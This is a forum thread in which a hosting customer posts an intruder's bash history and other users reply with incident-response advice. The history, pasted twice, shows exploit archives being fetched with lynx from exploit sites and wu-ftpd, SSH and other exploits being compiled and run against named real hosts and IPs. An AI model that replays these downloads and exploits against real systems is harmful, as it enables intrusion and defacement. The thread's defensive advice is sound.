CAN SOMEONE TELL ME WHAT THIS GUY IS DOING ON MY LINUX BOX??? IT LOOKS HIGHLY SUSPICIOUS.. I was in linux shell doing my daily chores when I decided to run the command "w".. I saw 4 instances of an account being logged in so I looked at his bash and I think he's hacking..... Try to dipher what he's doing...

With all this suspicious activity going on, I looked at his BASH and there was all these files like EXPLOIT, HACKS, etc being downloaded.. So as he was continuing all of this, I decided to broadcast a message server wide...This is the msg I broadcast..

Broadcast message from root:
We monitor all suspicious activity.

As soon as I did that, he just stopped everything.. from all 4 connections.. I just saw "-bash" and nothing else.. Afterwards, he just logged off..


HIS WHOLE BASH_HISTORY....


./ft www.namkang.co.kr
PuTTY www.namkang.co.kr
ls -la
./sco lia.ac.id
ls -la
nslookup uph.edu
nslookup www.uph.edu
nslookup www.uph.edu
pico locale.c
gcc -o locale locale.c
ls -la
gcc -o lo locale.c
pico locale.c
pico locale.c
gcc -o lo locale.c
pico locale.c
gcc -o lo locale.c
ico alpd
pico alpd.c
gcc -o alpd.c alp
gcc -o alp alpd.c
ls -la
alpd
./alpd
alp
./alp
alp 24.1
./alp 24.1
./alp 202.53.225.133
./alp a
./alp 202.53
ls -la
rm id.log
telnet www.faithradio.com
209.207.253.67./ft
ls -la
./ft
PuTTY
./su
./wu
./wu -h
./wu -t 209.207.253.67
pico ani.c
gcc -o ani ani.c
./ani
./ani www.faithradio.com
ls -la
./ani www.faithradio.com
id
./tembak 202.152.37.58 53
./tembak 65.168.52.33 53
./tembak 65.168.52.33 53 |w
cd domba
ls -la
./btx www.richardpaul.com
./btx www.reseparkera.nu
./btx bsd1.golffans.com
./btx faithradio.com
./btx www.faithradio.com
./btx oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.mdlawnet.com
./sco www.lighthouse-studios.com
ftp thugscript.net
ls -la
./apache
./apache
chmod +x apache
ls -la
./apache
./apache 130.94.172.9
./apache 130.94.172.9
chmod +x wu
./wu
try -h
-h
./wu -h
./wu id >> id.log
./wu 130.94.172.9
./wu -t 130.94.172.9
./wu -tl 130.94.172.9 sukses
./wu -t 130.94.172.9
(./wu -p 2 -d 0xff4 ; cat
ls -la
]
/wu -p 2 -d 0xff4 ; cat
./wu -p 2 -d 0xff4 ; cat
pico c.c
gcc -o c c.c -lrpcsvc -lnsl -lsocket
ls -la
./wu
./wu -t 165.34.678
pico tembak.c
gcc -o tembak tembak.c
./tembak
./tembak 202.53.225.133 53
./tembak 65.168.52.33 53
LS -LA
ls -la
cd domba
ls -la
pico sco.c
gcc -o sco sco.c
ls -la
./sco www.k-times.com
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.gtaaaco.org
./sco sigma.cav.udesc.br
./sco ptsb.plateau.com.my
./sco mail.comab.com.br
./sco mail.comab.com.br
./sco unix.harrisondigital.com
./sco sail.nic.in
./sco www.shayne.com.tw
./sco www.mvp.gov.ba
cd domba
ls -la
cd Linux
ls -la
lynx http://packetstormsecurity.org/0012-exploits/7350wu-v5.tar.gz
ls -la
tar -zxvf 7350wu-v5.tar.gz
ls -la
cd
cd 7350wu
cd 7350wu
ls -la
cd domba
cd Linux
cd 7350wu
ls -la
pwd
cp 7350wu.c /home/ihcrew/domba/Linux/
cd ..
ls -la
cd vetescan
ls -la
cp z0ne /home/ihcrew/domba/Linux/
cd ..
pwd
ls -la
./zone tw -o >> tw.log
./z0ne tw -o >> tw.log
cd ..
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/exploit/ssh/ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Exploit_Code_Archive/wuftpd-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/exploit/ssh/ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Exploit_Code_Archive/wuftpd-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c

----

This is where he received the broadcast message and a few mins later was idle, then after 5mins he loggd off all 4 connections.. all different IP addresses..

:(

Well as long as he wasn't logged in as root, you should be OK, if he was, then you need to contact your host, to talk about rebuilding the /usr folder, to make sure he didn't install a root kit....

Well, that person was definitely up to no good. And, as with all the people I see like that users activities, they didn't have much of a clue of what they were doing. However, the fact does remain that they downloaded and ran a few exploits and they might have managed to successfully run one of them and gain root. I'd suggest you check and make sure that nothing was compromised. Check the date on ay common files to see if they've been changed and trojaned, such as ls, ps, top, etc. Also, check the date and for any strange files in your rc.d and init dirs and files. Check dmesg to see if you are running in promiscuous mode and check to see that there's no new users in your passwd file with the user or group of 0, etc. Also, check the logs to make sure they are there and check to see if this user's IP block has logged into anywhere else. (check system logs, as well as the web sever logs, because crackers often leave tracks there and don't remove them). Put an * asterisk at the beginning of their shadowed password to invalidate their account and check to make sure that this user is the account holder and not someone that has their account compromised.

Finally, firewall that cracker's IP block and report them. Of course, there's other steps to take, but do your checking and make sure you clean stuff up and prevent them from getting back in. Save all the evidence in a root owned dir that denies anyone else permission, and copy the logs. Try and see how they got in, if it's not the user themselves trying to screw around. Again, there's more to it, but that is a start for now...

Who knows with all of the weird names of the programs that he was compiling on what they actually do, without looking at them, but it looks more like he was setting up a base for attacking other systems than rooting yours.

I visited a few of the URL's that he ran programs against, and some of the web sites have been defaced.

You definitely should cancel the user's account, and even notify the authorities, and start getting as much information as you can on the user.

They're probably using a stolen credit card, too.

http://www.richardpaul.com/ is one of the sites defaced.

It does also show that local exploits and programs were ran against the localhost. Also, that a lot of crackers will not usually tryand attack oher hosts from yours, unless they've owned you before hand, or unless they are just using your server for an attack launch pad, which means they are probably connecting from a rooted system anyway. Again, make sure that's not a user's account being compromised, as a lot of user's don't protect their passwords well, usually, or choose simple passwords. Someone could have compromised someone's account to use to attack other servers. You can almost bet that this person was logging in from a rooted system that will not result in any way of tracking where they actually came from. Contact the servers that were being attacked, as well as the servers that were connecting to your system. They likely don't know they've been compromised and you can remove some of the access this cracker has to their systems and on down the line. They can act quicker than any authorities and can gather evidence, if there's any there to gather.

Yep, report that fool. Search this forum, at one point(long time ago, couple of months) I think someone listed a link the FBI computer crimes section, where u can file this. It also might be listed on cert. On another note, I saw that site defaced. Why dont they add an address to that discription of their group while at it. I mean god, look at what info they gave.

HI!
I guess the first thing you must do is cancel his account. Then tell him that we has violated the TOS and scare him.... :)
Also change your root password and other passwords if possible and see if everything is working fine....
Have a great day :)

regards
amar

Of course if he owns the server anyway then a root password change really isnt going to do much but its still something you should do. But do it after to make sure no other users were changed to root access in the passwd file .

The same guy bought 3x $100/mo plans..

If he did, that is good stuff to take to the FBI. Assuming it wasn't his CC #.